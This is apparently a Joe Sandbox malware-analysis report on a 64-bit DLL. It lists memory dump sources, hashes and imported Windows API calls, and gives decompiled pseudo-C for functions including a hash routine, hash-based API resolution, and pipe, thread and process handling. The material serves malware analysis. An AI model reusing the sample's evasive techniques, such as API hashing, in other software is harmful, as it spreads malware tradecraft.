Memory Dump Source

Source File: 00000000.00000002.264923072.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000000.00000002.264916129.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.264935259.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.264942616.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd

Similarity

API ID: CriticalSectionTime$EnterFileLeaveSleepSystem
String ID:
API String ID: 1722460308-0
Opcode ID: 2dd8831bc9f43de6d569c4ecde058db3d0dea22e16b3234fabfd63794af3f721
Instruction ID: 4ead8fb80c48ce341bb99ce9a75b77310841507c5221c0524d6be850b07dbd1f
Opcode Fuzzy Hash: 2dd8831bc9f43de6d569c4ecde058db3d0dea22e16b3234fabfd63794af3f721
Instruction Fuzzy Hash: 08017933718A8497D796CF21E0503DA77A0F799B84F885012EB8947A55DF38DAB9C740

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180009C54 Relevance: .6, Instructions: 616
COMMONCrypto

Download Yara Rule

C-Code - Quality: 56%

			E00000001180009C54(void* __eflags, void* __rax, long long __rbx, long long __rcx, void* __rdx, void* __r9, void* __r10, void* __r11, void* _a8, long long _a16, intOrPtr _a24) {
				void* _v60;
				void* _v64;
				intOrPtr _v68;
				void* _v72;
				void* _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				void* _v88;
				intOrPtr _v92;
				void* _v96;
				intOrPtr _v100;
				void* _v104;
				void* _v108;
				void* _v112;
				intOrPtr _v116;
				intOrPtr _t385;
				signed int _t388;
				signed int _t567;
				signed int _t596;
				signed char* _t610;
				signed char* _t611;
				void* _t612;
				void* _t613;
				signed int* _t616;
				signed int* _t617;
				void* _t619;
				intOrPtr* _t620;

				_a16 = __rbx;
				_a8 = __rcx;
				r10d =  *(__rcx + 4);
				r11d =  *((intOrPtr*)(__rcx + 8));
				_a24 =  *((intOrPtr*)(__rcx));
				_t610 = __rdx + 2;
				_t616 = _t613 - 0x40;
				r9d = 0x10;
				_t611 =  &(_t610[4]);
				 *_t616 = (((_t610[1] & 0x000000ff) << 0x00000008 |  *_t610 & 0x000000ff) << 0x00000008 |  *(_t611 - 5) & 0x000000ff) << 0x00000008 |  *(_t611 - 6) & 0x000000ff;
				_t617 =  &(_t616[1]);
				_t619 = __r9 - 1;
				if (__eflags != 0) goto 0x80009c8f;
				r15d = _v100;
				r12d = _v92;
				asm("rol edx, 0x7");
				r8d = __rcx + __rbx - 0x173848aa;
				asm("inc ecx");
				r8d = r8d + __rcx + _t612 - 0x28955b88 + r10d;
				r9d = __rcx + __r11 + 0x242070db;
				asm("inc ecx");
				r9d = r9d + r8d;
				r10d = __rcx + __r10 - 0x3e423112;
				asm("inc ecx");
				r10d = r10d + r9d;
				r11d = __rcx + _t611 - 0xa83f051;
				asm("inc ecx");
				r11d = r11d + r10d;
				asm("rol edx, 0xc");
				r8d = __rcx + _t619 - 0x57cfb9ed;
				asm("inc ecx");
				r8d = r8d + __rcx +  &(_t617[0x11e1f18a]) + r11d;
				r9d = __rcx + __r10 - 0x2b96aff;
				asm("inc ecx");
				r13d = _v80;
				r14d = _v68;
				r9d = r9d + r8d;
				r10d = __rcx + __r11 + 0x698098d8;
				asm("inc ecx");
				r10d = r10d + r9d;
				asm("rol edx, 0xc");
				asm("ror edi, 0xf");
				r9d = __rcx + _t619 - 0x76a32842;
				asm("inc ecx");
				r9d = r9d + __rcx + _t617 - 0xa44f + __rcx + _t611 - 0x74bb0851 + r10d;
				r11d = __rcx + __r10 + 0x6b901122;
				asm("inc ecx");
				r11d = r11d + r9d;
				asm("rol ebx, 0xc");
				_t388 = __rcx + _t611 - 0x2678e6d + r11d;
				r8d = _t388;
				r8d =  !r8d;
				r10d = __rcx + _t612 - 0x5986bc72;
				asm("inc ecx");
				r10d = r10d + _t388;
				r8d = r8d & r10d;
				r9d = __rcx + _t619 + 0x49b40821;
				asm("inc ecx");
				r9d = r9d + r10d;
				r8d = r8d | _t388 & r9d;
				r8d = r8d + _v116;
				r11d = _t617 + __r11 - 0x9e1da9e;
				asm("inc ecx");
				r11d = r11d + r9d;
				r8d =  &(_t611[__rbx - 0x3fbf4cc0]);
				asm("inc ecx");
				r8d = r8d + r11d;
				asm("rol edx, 0xe");
				r10d = __rcx + _t619 - 0x16493856;
				asm("inc ecx");
				r10d = r10d + __rcx + __r10 + 0x265e5a51 + r8d;
				r9d = __rcx + __r11 - 0x29d0efa3;
				asm("inc ecx");
				r9d = r9d + r10d;
				r11d = __rcx +  &(_t617[0x910514]);
				asm("inc ecx");
				r11d = r11d + r9d;
				r8d = __rcx + _t611 - 0x275e197f;
				asm("inc ecx");
				r8d = r8d + r11d;
				asm("ror edx, 0xc");
				r10d = __rcx + _t619 + 0x21e1cde6;
				asm("inc ecx");
				r10d = r10d + __rcx + __r10 - 0x182c0438 + r8d;
				r9d = __rcx + __r11 - 0x3cc8f82a;
				asm("inc ecx");
				r9d = r9d + r10d;
				r11d = __rcx + _t617 - 0xb2af279;
				asm("inc ecx");
				r11d = r11d + r9d;
				asm("ror ebx, 0xc");
				asm("rol edx, 0x5");
				r8d = __rcx + _t619 - 0x3105c08;
				asm("inc ecx");
				r8d = r8d + __rcx + __r10 - 0x561c16fb + __rcx +  &(_t611[0x455a14ed]) + r11d;
				r9d = __rcx + __r11 + 0x676f02d9;
				asm("inc ecx");
				r9d = r9d + r8d;
				r10d = __rcx + __rbx - 0x72d5b376;
				asm("inc ecx");
				r10d = r10d + r9d;
				asm("rol edx, 0x4");
				r8d = __rax + _t617 - 0x788e097f;
				asm("inc ecx");
				r8d = r8d + __rax + _t611 - 0x5c6be + r10d;
				r9d = __rax + _t619 + 0x6d9d6122;
				asm("inc ecx");
				r9d = r9d + r8d;
				r10d = __rax + __r10 - 0x21ac7f4;
				asm("inc ecx");
				r10d = r10d + r9d;
				r11d = __rcx + _t611 - 0x5b4115bc;
				asm("inc ecx");
				r11d = r11d + r10d;
				asm("rol edx, 0xb");
				r8d = __rax + _t619 - 0x944b4a0;
				asm("inc ecx");
				r8d = r8d + __rax +  &(_t617[0x12f7b3ea]) + r11d;
				r9d = __rax + __r10 - 0x41404390;
				asm("inc ecx");
				r9d = r9d + r8d;
				r10d = __rcx + __r11 + 0x289b7ec6;
				asm("inc ecx");
				r10d = r10d + r9d;
				r11d = __rax + _t611 - 0x155ed806;
				asm("inc ecx");
				r11d = r11d + r10d;
				r8d = __rax + _t617 - 0x2b10cf7b;
				asm("inc ecx");
				r8d = r8d + r11d;
				asm("ror edx, 0x9");
				r9d = __rcx + __r10 - 0x262b2fc7;
				asm("inc ecx");
				r9d = r9d + __rax + _t619 + 0x4881d05 + r8d;
				asm("rol ecx, 0xb");
				r10d = __rax +  &(_t617[0x7e89f3e]);
				asm("inc ecx");
				r10d = r10d + __rax + __r11 - 0x1924661b + r9d;
				r8d = __rax + _t611 - 0x3b53a99b;
				asm("inc ecx");
				r8d = r8d + r10d;
				asm("rol edx, 0x6");
				r9d = __rax + __rcx + 0x432aff97;
				asm("inc ecx");
				r9d = r9d + __rax + _t619 - 0xbd6ddbc + r8d;
				asm("rol ecx, 0xf");
				r10d = __rax + _t617 - 0x36c5fc7;
				asm("inc ecx");
				r10d = r10d + __rax + __r10 - 0x546bdc59 + r9d;
				r8d = __rax +  &(_t611[0x655b59c3]);
				asm("inc ecx");
				r8d = r8d + r10d;
				asm("rol edx, 0xa");
				r9d = __rax + __rcx - 0x100b83;
				asm("inc ecx");
				r9d = r9d + __rax + _t619 - 0x70f3336e + r8d;
				asm("ror ecx, 0xb");
				r10d = __rax +  &(_t617[0x1bea1f93]);
				asm("inc ecx");
				r10d = r10d + __rax + __r10 - 0x7a7ba22f + r9d;
				r11d = __rax + _t611 - 0x1d31920;
				asm("inc ecx");
				r11d = r11d + r10d;
				r9d = __rax + _t619 - 0x5cfebcec;
				asm("inc ecx");
				r9d = r9d + r11d;
				asm("ror ebx, 0xb");
				r8d = __rax + __r10 - 0x8ac817e;
				asm("inc ecx");
				r8d = r8d + __rax + __rcx + 0x4e0811a1 + r9d;
				asm("rol edx, 0xa");
				_t596 = __rax + __r11 - 0x42c50dcb + r8d;
				_t620 = _a8;
				asm("rol ecx, 0xf");
				r8d =  !r8d;
				 *_t620 = _a24 + r8d;
				_t567 = __rax + _t619 + 0x2ad7d2bb + _t596;
				r8d = r8d | _t567;
				r8d = r8d ^ _t596;
				r8d = r8d + _v84;
				asm("ror eax, 0xb");
				 *((intOrPtr*)(_t620 + 4)) = _t617 + __rbx - 0x14792c6f +  *((intOrPtr*)(_t620 + 4)) + _t567;
				 *((intOrPtr*)(_t620 + 8)) =  *((intOrPtr*)(_t620 + 8)) + _t567;
				_t385 =  *((intOrPtr*)(_t620 + 0xc)) + _t596;
				 *((intOrPtr*)(_t620 + 0xc)) = _t385;
				return _t385;
			}

0x180009c54
0x180009c59
0x180009c6f
0x180009c73
0x180009c7a
0x180009c81
0x180009c85
0x180009c89
0x180009c96
0x180009cb1
0x180009cb4
0x180009cb8
0x180009cbc
0x180009cbe
0x180009cc3
0x180009ce4
0x180009cf9
0x180009d01
0x180009d05
0x180009d1e
0x180009d26
0x180009d2a
0x180009d40
0x180009d48
0x180009d4c
0x180009d63
0x180009d6b
0x180009d6f
0x180009d8a
0x180009da4
0x180009dac
0x180009db0
0x180009dc3
0x180009dcb
0x180009dcf
0x180009dd8
0x180009de1
0x180009dfa
0x180009e02
0x180009e06
0x180009e21
0x180009e42
0x180009e58
0x180009e60
0x180009e64
0x180009e78
0x180009e80
0x180009e84
0x180009e9d
0x180009ea0
0x180009ea3
0x180009eab
0x180009eba
0x180009ec2
0x180009ec6
0x180009eda
0x180009ee3
0x180009eeb
0x180009eef
0x180009efb
0x180009f03
0x180009f08
0x180009f10
0x180009f14
0x180009f23
0x180009f2b
0x180009f2f
0x180009f4b
0x180009f61
0x180009f6e
0x180009f74
0x180009f81
0x180009f8d
0x180009f94
0x180009f9f
0x180009fac
0x180009fb3
0x180009fc0
0x180009fcd
0x180009fd1
0x180009feb
0x18000a007
0x18000a014
0x18000a01a
0x18000a024
0x18000a030
0x18000a037
0x18000a045
0x18000a052
0x18000a059
0x18000a077
0x18000a097
0x18000a0a6
0x18000a0b2
0x18000a0b8
0x18000a0c5
0x18000a0d1
0x18000a0d8
0x18000a0e4
0x18000a0ec
0x18000a0f0
0x18000a10c
0x18000a118
0x18000a120
0x18000a124
0x18000a136
0x18000a13e
0x18000a142
0x18000a14e
0x18000a159
0x18000a15d
0x18000a16a
0x18000a172
0x18000a176
0x18000a188
0x18000a19b
0x18000a1a3
0x18000a1a7
0x18000a1b5
0x18000a1c0
0x18000a1c4
0x18000a1d0
0x18000a1d8
0x18000a1dc
0x18000a1e5
0x18000a1ed
0x18000a1f1
0x18000a204
0x18000a20c
0x18000a210
0x18000a22a
0x18000a238
0x18000a240
0x18000a244
0x18000a254
0x18000a263
0x18000a26d
0x18000a271
0x18000a27e
0x18000a28a
0x18000a28e
0x18000a2a7
0x18000a2b5
0x18000a2c2
0x18000a2c6
0x18000a2dc
0x18000a2ea
0x18000a2f7
0x18000a2fb
0x18000a305
0x18000a311
0x18000a315
0x18000a32d
0x18000a33d
0x18000a34a
0x18000a34e
0x18000a366
0x18000a375
0x18000a382
0x18000a386
0x18000a390
0x18000a39c
0x18000a3a0
0x18000a3ad
0x18000a3ba
0x18000a3be
0x18000a3d6
0x18000a3e5
0x18000a3f2
0x18000a3f6
0x18000a40e
0x18000a411
0x18000a425
0x18000a437
0x18000a43a
0x18000a43d
0x18000a440
0x18000a442
0x18000a445
0x18000a448
0x18000a455
0x18000a45e
0x18000a470
0x18000a478
0x18000a47a
0x18000a48d

Memory Dump Source

Source File: 00000000.00000002.264923072.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000000.00000002.264916129.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.264935259.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.264942616.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1e22f3bce40282fe11e099c1db0b1c5fb4d2825a674946890b536f4ba39d9287
Instruction ID: da65757d923d1ece893e98337654064ca0bb37cf04d21ba61795d8811ff59a21
Opcode Fuzzy Hash: 1e22f3bce40282fe11e099c1db0b1c5fb4d2825a674946890b536f4ba39d9287
Instruction Fuzzy Hash: 5912B4B7B784514BD71CCB19E892FA97792F394308B49912CEA17D3F44DA3DEA06CA40

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180008368 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 154
filepipethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateEventA.KERNEL32 ref: 000000018000839A
ResumeThread.KERNEL32 ref: 00000001800083EE
GetExitCodeProcess.KERNEL32 ref: 00000001800083FD
PeekNamedPipe.KERNEL32 ref: 0000000180008437
ReadFile.KERNEL32 ref: 0000000180008465
WriteFile.KERNEL32 ref: 00000001800084DC
WaitForMultipleObjects.KERNEL32 ref: 0000000180008500
WriteFile.KERNEL32 ref: 0000000180008567
ResetEvent.KERNEL32 ref: 0000000180008576
GetLastError.KERNEL32 ref: 000000018000858B
GetLastError.KERNEL32 ref: 0000000180008598
CloseHandle.KERNEL32 ref: 00000001800085AA

Part of subcall function 000000018000459C: SetLastError.KERNEL32 ref: 00000001800045D8

Strings

.RK, xrefs: 000000018000851D

Memory Dump Source

Source File: 00000000.00000002.264923072.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000000.00000002.264916129.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.264935259.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.264942616.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd

Similarity

API ID: ErrorFileLast$EventWrite$CloseCodeCreateExitHandleMultipleNamedObjectsPeekPipeProcessReadResetResumeThreadWait
String ID: .RK
API String ID: 1606758550-3354657194
Opcode ID: e535ec2e64825705009bac7a413637230dfc8d2d18d7f6c6a3e224415b496589
Instruction ID: c67b93fc325dec5a333161014b43f1cf91cc3d00d80d1a92eadb22293fcdf481
Opcode Fuzzy Hash: e535ec2e64825705009bac7a413637230dfc8d2d18d7f6c6a3e224415b496589
Instruction Fuzzy Hash: 6C614032314A49D2EB92CB25E9947DA73E0FB8C7C5F408121FB8987A94DF38D658DB10

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800031D4 Relevance: 18.1, APIs: 12, Instructions: 130memorystringCOMMON

Download Yara Rule

APIs

Part of subcall function 0000000180006A84: HeapAlloc.KERNEL32 ref: 0000000180006B46
Part of subcall function 0000000180006A84: HeapFree.KERNEL32 ref: 0000000180006B78
Part of subcall function 0000000180006A84: HeapFree.KERNEL32 ref: 0000000180006B86

lstrlenA.KERNEL32(00000000,0000000180006466), ref: 0000000180003221
HeapAlloc.KERNEL32 ref: 0000000180003239
memcpy.NTDLL ref: 0000000180003259
lstrcpyA.KERNEL32 ref: 0000000180003265
lstrlenA.KERNEL32 ref: 000000018000326E

Part of subcall function 0000000180001208: EnterCriticalSection.KERNEL32(?,000000018000134F), ref: 0000000180001256
Part of subcall function 0000000180001208: LeaveCriticalSection.KERNEL32 ref: 0000000180001265
Part of subcall function 0000000180001208: HeapAlloc.KERNEL32 ref: 000000018000129C

HeapFree.KERNEL32 ref: 000000018000329E

Part of subcall function 000000018000467C: HeapAlloc.KERNEL32 ref: 00000001800046D2

HeapAlloc.KERNEL32 ref: 0000000180003316
UrlEscapeA.SHLWAPI ref: 0000000180003335
HeapFree.KERNEL32 ref: 0000000180003358
HeapFree.KERNEL32 ref: 000000018000336D
HeapFree.KERNEL32 ref: 000000018000337D
HeapFree.KERNEL32 ref: 000000018000338B

Memory Dump Source

Source File: 00000000.00000002.264923072.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000000.00000002.264916129.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.264935259.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.264942616.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd

Similarity

API ID: Heap$Free$Alloc$CriticalSectionlstrlen$EnterEscapeLeavelstrcpymemcpy
String ID:
API String ID: 1109037607-0
Opcode ID: d44f845e7b71ac1e4097b2ef269f920d9d6927053d5c93f366d8a1b5ec574062
Instruction ID: acf6d717728defc35103db72fb922d6f00203a7e454cd640fbdac6a35d594990
Opcode Fuzzy Hash: d44f845e7b71ac1e4097b2ef269f920d9d6927053d5c93f366d8a1b5ec574062
Instruction Fuzzy Hash: F0519A35304B8986EB96CB67A8447DA73A5FB8DFC4F44C025EE4A83754EE39C609C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180007950 Relevance: 18.1, APIs: 12, Instructions: 78sleepmemorysynchronizationCOMMON

Download Yara Rule

APIs

SetEvent.KERNEL32 ref: 000000018000798D
WaitForSingleObject.KERNEL32 ref: 00000001800079AA
CloseHandle.KERNEL32 ref: 00000001800079B4
CloseHandle.KERNEL32 ref: 00000001800079C3
EnterCriticalSection.KERNEL32 ref: 00000001800079CD
LeaveCriticalSection.KERNEL32 ref: 00000001800079F4
Sleep.KERNEL32 ref: 0000000180007A03
Sleep.KERNEL32 ref: 0000000180007A17
CloseHandle.KERNEL32 ref: 0000000180007A2F
CloseHandle.KERNEL32 ref: 0000000180007A3E
HeapFree.KERNEL32 ref: 0000000180007A51
DeleteCriticalSection.KERNEL32 ref: 0000000180007A5B

Memory Dump Source

Source File: 00000000.00000002.264923072.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000000.00000002.264916129.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.264935259.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.264942616.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd

Similarity

API ID: CloseHandle$CriticalSection$Sleep$DeleteEnterEventFreeHeapLeaveObjectSingleWait
String ID:
API String ID: 2177250193-0
Opcode ID: 077b512303bddf46be07a072b110e746afb00398c40a4b8bf0a8799af97e695f
Instruction ID: f3fed24fe94b1aa8e153d29e7a34276cc5438fe7d956490b47d4b11a712edef8
Opcode Fuzzy Hash: 077b512303bddf46be07a072b110e746afb00398c40a4b8bf0a8799af97e695f
Instruction Fuzzy Hash: EA31F536701A4986EB96DF62E8503AD3360FB98FD4F44C021EA5E936A5DF38CA4DC701

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000A6EC Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 200libraryCOMMON

Download Yara Rule

APIs

RaiseException.KERNEL32 ref: 000000018000A783
LoadLibraryA.KERNEL32 ref: 000000018000A829
GetLastError.KERNEL32 ref: 000000018000A837
RaiseException.KERNEL32 ref: 000000018000A87F

Strings

H, xrefs: 000000018000A710

Memory Dump Source

Source File: 00000000.00000002.264923072.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000000.00000002.264916129.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.264935259.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.264942616.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd

Similarity

API ID: ExceptionRaise$ErrorLastLibraryLoad
String ID: H
API String ID: 948315288-2852464175
Opcode ID: 35d5fb0c792fb9595ca7fe69b0557c78035173cf4c2b5f0dd7936f8c3fb862ce
Instruction ID: 40cf2675a00ff9b37053f4863b037564f167e8a7fa8b642abd638291e1f5e275
Opcode Fuzzy Hash: 35d5fb0c792fb9595ca7fe69b0557c78035173cf4c2b5f0dd7936f8c3fb862ce
Instruction Fuzzy Hash: 7F914C32209B4996EBA6CF15E4447A9B3A1F74DBC4F09C129EA8D47754EF3CDA4AC700

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000431C Relevance: 16.7, APIs: 11, Instructions: 174
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 25%

			E0000000118000431C(void* __edx, signed long long __rax, long long __rbx, intOrPtr* __rcx, long long __rbp, signed short _a8, intOrPtr _a16, long long _a24, long long _a32) {
				void* _v40;
				void* _v56;
				void* _v72;
				void* __rdi;
				void* __rsi;
				long _t75;
				signed long long _t121;
				signed long long _t122;
				intOrPtr* _t124;
				void* _t151;
				void* _t158;
				void* _t172;

				_t162 = __rbp;
				_t121 = __rax;
				_a24 = __rbx;
				_a32 = __rbp;
				_t161 =  *0x8000d4a0;
				_t124 = __rcx;
				r14d = 0;
				WaitForSingleObject(??, ??);
				if ( *((intOrPtr*)(__rcx + 0x50)) == r14d) goto 0x8000449d;
				E0000000118000459C(0xb74c62f4, __rax,  *((intOrPtr*)( *0x8000d4a0 + 0x30)));
				if (_t121 == _t172) goto 0x80004372;
				 *_t121();
				_t151 = __rcx + 0x4c;
				r8d = 0x10;
				memcpy(??, ??, ??);
				E0000000118000459C(0x176fdd38, _t121,  *((intOrPtr*)( *0x8000d4a0 + 0x30)));
				if (_t121 == _t172) goto 0x800043a9;
				_t10 = _t151 + 1; // 0x2
				_t11 = _t151 + 5; // 0x6
				r8d = _t11;
				 *_t121();
				goto 0x800043ad;
				_t122 = _t121 | 0xffffffff;
				 *(__rcx + 0x10) = _t122;
				if (_t122 == 0xffffffff) goto 0x8000444d;
				E0000000118000459C(0x66454c9c, _t122,  *((intOrPtr*)( *0x8000d4a0 + 0x30)));
				if (_t122 == _t172) goto 0x800043e0;
				r8d = 0x10;
				 *_t122();
				goto 0x800043e3;
				if (r14d != r14d) goto 0x80004435;
				r8d = 1;
				_a8 = r14w;
				if (E00000001180008150(_t10, 0x66454c9c, __rcx,  *(__rcx + 0x10),  *__rcx, _t158,  *0x8000d4a0, __rbp,  &_a8) != r14d) goto 0x80004442;
				SetEvent(??);
				r9d = _a8 & 0x0000ffff;
				if (E000000011800091F8(_t10, _t124, _t124,  *((intOrPtr*)(_t124 + 0x10)), _t161, _t162,  &_a8) != r14d) goto 0x80004442;
				goto 0x8000447e;
				if (GetLastError() == r14d) goto 0x80004481;
				E00000001180008308(_t122, _t124, _t124 + 0x10);
				goto 0x80004455;
				if (GetLastError() == r14d) goto 0x80004481;
				if (r14d + 1 !=  *((intOrPtr*)(_t124 + 0x44))) goto 0x80004481;
				ResetEvent(??);
				WaitForSingleObject(??, ??);
				if (WaitForSingleObject(??, ??) == 0x102) goto 0x80004386;
				goto 0x80004570;
				E0000000118000459C(0x544646d0, _t122,  *((intOrPtr*)(_t124 + 0x20)));
				if (_t122 == _t172) goto 0x800044be;
				r8d = 0x10;
				 *_t122();
				goto 0x800044c1;
				if (r14d != r14d) goto 0x80004568;
				_a16 = 0x10;
				E0000000118000459C(0xd0aed27e, _t122,  *((intOrPtr*)(_t161 + 0x30)));
				if (_t122 == _t172) goto 0x800044f2;
				 *_t122();
				goto 0x800044f5;
				if (r14d != r14d) goto 0x80004568;
				SetEvent(??);
				E0000000118000459C(0xa1aa58b7, _t122,  *((intOrPtr*)(_t161 + 0x30)));
				if (_t122 == _t172) goto 0x8000452c;
				 *_t122();
				goto 0x80004530;
				if ((_t122 | 0xffffffff) == 0xffffffff) goto 0x80004568;
				r9d = 0;
				if (E000000011800091F8(_t10, _t124, _t124, _t122 | 0xffffffff, _t161, _t162,  &_a8) == r14d) goto 0x80004504;
				E0000000118000459C(0xb74c62f4, _t122,  *((intOrPtr*)(_t161 + 0x30)));
				if (_t122 == _t172) goto 0x80004504;
				 *_t122();
				goto 0x80004504;
				_t75 = GetLastError();
				ReleaseMutex(??);
				asm("lock add dword [esi+0x38], 0xffffffff");
				return _t75;
			}

0x18000431c
0x18000431c
0x18000431c
0x180004321
0x180004332
0x180004339
0x180004340
0x180004349
0x180004357
0x180004362
0x18000436a
0x180004370
0x180004372
0x18000437b
0x180004381
0x18000438f
0x180004397
0x18000439e
0x1800043a1
0x1800043a1
0x1800043a5
0x1800043a7
0x1800043a9
0x1800043ad
0x1800043b5
0x1800043c4
0x1800043cc
0x1800043d6
0x1800043dc
0x1800043de
0x1800043e6
0x1800043f4
0x1800043fa
0x18000440a
0x180004410
0x180004416
0x180004431
0x180004433
0x180004440
0x180004446
0x18000444b
0x180004458
0x18000445f
0x180004465
0x180004478
0x180004492
0x180004498
0x1800044a2
0x1800044aa
0x1800044b4
0x1800044ba
0x1800044bc
0x1800044c4
0x1800044d3
0x1800044db
0x1800044e3
0x1800044ee
0x1800044f0
0x1800044f8
0x1800044fe
0x18000450d
0x180004515
0x180004525
0x18000452a
0x180004534
0x18000453b
0x18000454c
0x180004557
0x18000455f
0x180004564
0x180004566
0x180004568
0x180004574
0x18000457a
0x180004599

APIs

WaitForSingleObject.KERNEL32 ref: 0000000180004349
memcpy.NTDLL ref: 0000000180004381
SetEvent.KERNEL32 ref: 0000000180004410
GetLastError.KERNEL32 ref: 0000000180004435
ResetEvent.KERNEL32 ref: 0000000180004465
WaitForSingleObject.KERNEL32 ref: 0000000180004478
WaitForSingleObject.KERNEL32 ref: 0000000180004487
SetEvent.KERNEL32 ref: 00000001800044FE
GetLastError.KERNEL32 ref: 0000000180004568
ReleaseMutex.KERNEL32 ref: 0000000180004574

Part of subcall function 000000018000459C: SetLastError.KERNEL32 ref: 00000001800045D8

Memory Dump Source

Source File: 00000000.00000002.264923072.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000000.00000002.264916129.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.264935259.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.264942616.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd

Similarity

API ID: ErrorEventLastObjectSingleWait$MutexReleaseResetmemcpy
String ID:
API String ID: 1434584367-0
Opcode ID: 05eca3f02c4307a6bece942e39cfd0a26e8b6ec2b72e247ee98873b9e6061124
Instruction ID: da870e4c5b3f8ba762a5b16c43bcb008f7342bdb94fea84615746d30c68c72b5
Opcode Fuzzy Hash: 05eca3f02c4307a6bece942e39cfd0a26e8b6ec2b72e247ee98873b9e6061124
Instruction Fuzzy Hash: 817173B2210A0882EBA2DF65D4503ED3361F78CBE4F148612EE6A5B7D5CE34CA898705

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180007444 Relevance: 16.6, APIs: 11, Instructions: 146memorystringtimeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(?,?,00000000,?,00000000,0000000180006222), ref: 0000000180007489
_snprintf.NTDLL ref: 00000001800074BB
lstrlenA.KERNEL32 ref: 00000001800074D7
HeapAlloc.KERNEL32 ref: 000000018000750F
_snprintf.NTDLL ref: 0000000180007540
HeapAlloc.KERNEL32 ref: 000000018000754F
_snprintf.NTDLL ref: 00000001800075B7
memcpy.NTDLL ref: 00000001800075CB
memcpy.NTDLL ref: 00000001800075E2
_snprintf.NTDLL ref: 0000000180007620
HeapFree.KERNEL32 ref: 0000000180007653

Memory Dump Source

Source File: 00000000.00000002.264923072.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000000.00000002.264916129.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.264935259.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.264942616.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd

Similarity

API ID: _snprintf$Heap$AllocTimememcpy$FileFreeSystemlstrlen
String ID:
API String ID: 1448584724-0
Opcode ID: 1873a16970b6eb1eb8123085a0dd6b0133f1a5a141746e4d2519f222aa328f56
Instruction ID: 43bd3c41a0e216f1fe2d256970a36843f92bdaad392a56b89b43ab90d53a1bd0
Opcode Fuzzy Hash: 1873a16970b6eb1eb8123085a0dd6b0133f1a5a141746e4d2519f222aa328f56
Instruction Fuzzy Hash: 5851AB36B14A4886EB92CF16E8047DA77A5F78CBC4F558121EE0D83755EF38DA1AC700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180006754 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 81processmemoryCOMMON

Download Yara Rule

APIs

memset.NTDLL ref: 0000000180006786

Part of subcall function 00000001800089E4: HeapAlloc.KERNEL32(?,?,?,0000000180006E17,?,?,?,?,00000000,00000001800052B1), ref: 0000000180008A5D

CreateProcessW.KERNEL32 ref: 00000001800067F7
WaitForMultipleObjects.KERNEL32 ref: 0000000180006824
